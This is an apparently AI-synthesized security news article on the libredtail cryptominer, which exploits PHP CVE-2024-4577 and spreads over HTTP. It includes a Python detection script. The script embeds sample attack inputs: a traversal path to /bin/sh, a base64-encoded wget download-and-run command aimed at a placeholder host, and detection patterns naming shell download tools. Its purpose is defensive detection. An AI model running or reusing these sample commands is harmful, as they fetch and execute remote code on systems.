VYPR Research · Published Apr 30, 2026 · Updated May 18, 2026 · 1 source

Libredtail Cryptominer Spreads via HTTP, Exploiting PHP CGI Vulnerability

A new variant of the Redtail cryptominer, dubbed 'libredtail,' is actively spreading via HTTP by exploiting CVE-2024-4577 to compromise PHP servers and deploy cryptocurrency mining payloads.

A guest diary published by the SANS Internet Storm Center (ISC) has detailed a new variant of the Redtail cryptominer, dubbed 'libredtail,' that is actively spreading via HTTP rather than the traditional SSH or Telnet vectors. The analysis, conducted by ISC intern James Roberts using a DShield honeypot, reveals that attackers are exploiting a known PHP CGI vulnerability (CVE-2024-4577) to gain initial access and deploy cryptocurrency mining payloads.

The attack chain begins with a series of HTTP POST requests that employ directory traversal to reach /bin/sh, attempting to execute commands on the target server. The attackers then attempt to download payloads from attacker-controlled infrastructure such as 31.57.216.121/sh using wget and curl. The top attacking IPs observed were 82.165.66.87 (Germany), 103.40.61.98 (India), and 2.27.53.96 (UK), all of which also performed SSH brute-force attempts against the honeypot.

A key component of the attack is the exploitation of CVE-2024-4577, a vulnerability in older PHP versions that allows attackers to bypass character encoding protections and inject arbitrary PHP code. The attackers use this flaw to execute commands that download and run a script called 'cve_cve_2024_4577.selfrep_' from the same malicious infrastructure. The attackers often base64-encode these commands to obfuscate the payloads and ensure reliable delivery across different systems.

Once the initial payload is executed, the attackers deploy a script named 'apache.selfrep,' which is designed to maintain persistence on the compromised server. This script ensures that the cryptomining operation continues even after a reboot or service restart. The malware then connects to a command-and-control (C2) server to receive further instructions or download additional modules.

The libredtail variant represents an evolution of the Redtail cryptominer, which was previously observed spreading primarily over SSH and Telnet. By shifting to HTTP-based propagation, the attackers can target a wider range of internet-exposed services, particularly those running vulnerable PHP CGI configurations. This shift also makes detection more challenging, as HTTP traffic is often less scrutinized than SSH or Telnet connections.

Organizations running PHP servers should immediately verify that they are not using vulnerable versions of PHP (specifically those affected by CVE-2024-4577) and apply the necessary patches. Additionally, network defenders should monitor for suspicious HTTP POST requests containing directory traversal patterns or base64-encoded commands, as well as outbound connections to known malicious IPs associated with cryptomining infrastructure.
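To make the monitoring advice concrete, the following is an added example (not code from the ISC diary or from Vypr) that implements the three checks the paragraph names over constructed sample records: repeated URL-decoding of request paths to expose directory traversal, decoding of base64 fragments in request bodies to look for shell-command markers, and matching outbound flow records against the payload host named in the article (31.57.216.121). The request and flow record layouts are assumptions, as is the 203.0.113.10 TEST-NET address used in the constructed sample body; real honeypot or web-server logs will need their own parsers in front of these functions.

```python
"""Detection helpers for the libredtail HTTP propagation pattern.

Added example: the record formats and sample data below are constructed for
illustration and are not taken from the ISC diary or any honeypot export.
"""
import base64
import binascii
import re
from urllib.parse import unquote

# Indicator from the article: the host the attackers fetched payloads from.
KNOWN_BAD_HOSTS = {"31.57.216.121"}

TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
BASE64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SHELL_HINTS = ("wget ", "curl ", "/bin/sh", "chmod ", "sh -c", "| sh", "|sh")


def _fully_decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252e) are exposed."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def decode_b64_commands(text):
    """Return decoded base64 fragments from text that look like shell commands."""
    found = []
    for token in BASE64_TOKEN_RE.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
            decoded = raw.decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not printable text: ignore
        if any(hint in decoded for hint in SHELL_HINTS):
            found.append(decoded)
    return found


def classify_request(req):
    """req is a dict with 'method', 'path' and optional 'body' (assumed layout).
    Returns the list of rule names the request trips, in a fixed order."""
    reasons = []
    path = _fully_decode(req["path"])
    body = _fully_decode(req.get("body", ""))
    if TRAVERSAL_RE.search(path):
        reasons.append("traversal-in-path")
    if "/bin/sh" in path or "/bin/sh" in body:
        reasons.append("shell-binary-reference")
    if decode_b64_commands(body) or decode_b64_commands(path):
        reasons.append("base64-shell-command")
    return reasons


def scan_requests(requests):
    """Return (index, reasons) for every request that trips at least one rule."""
    hits = []
    for i, req in enumerate(requests):
        reasons = classify_request(req)
        if reasons:
            hits.append((i, reasons))
    return hits


def flag_outbound(flows, watchlist=KNOWN_BAD_HOSTS):
    """flows are 'src_ip dst_ip dst_port' strings (assumed layout).
    Returns (src, dst, port) tuples whose destination is on the watchlist."""
    hits = []
    for line in flows:
        src, dst, port = line.split()
        if dst in watchlist:
            hits.append((src, dst, int(port)))
    return hits


# Constructed sample requests: one benign GET, one traversal POST, one POST
# carrying a base64-encoded download command, one benign POST.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/index.php?page=home", "body": ""},
    {"method": "POST", "path": "/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh", "body": ""},
    {"method": "POST", "path": "/upload.php",
     "body": "cmd=" + base64.b64encode(b"cd /tmp; wget http://203.0.113.10/x; sh x").decode()},
    {"method": "POST", "path": "/api/v1/items", "body": "name=widget&qty=3"},
]

# Constructed sample flows: only the second one reaches the article's IOC host.
SAMPLE_FLOWS = [
    "10.0.0.5 93.184.216.34 443",
    "10.0.0.5 31.57.216.121 80",
    "10.0.0.7 10.0.0.1 53",
]

if __name__ == "__main__":
    for index, reasons in scan_requests(SAMPLE_REQUESTS):
        print(f"request {index}: {', '.join(reasons)}")
    for src, dst, port in flag_outbound(SAMPLE_FLOWS):
        print(f"outbound hit: {src} -> {dst}:{port}")
```

Running the script flags requests 1 and 2 and the single outbound flow to 31.57.216.121. The repeated decoding in `_fully_decode` matters in practice: a single `unquote` pass would leave `%252e%252e` in place and miss the traversal, which is exactly the sort of encoding trick the article's "less scrutinized HTTP traffic" observation hinges on.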

The SANS ISC has published the full technical analysis in their guest diary, providing indicators of compromise (IOCs) and detailed attack patterns to help defenders identify and block libredtail infections.

Synthesized by Vypr AI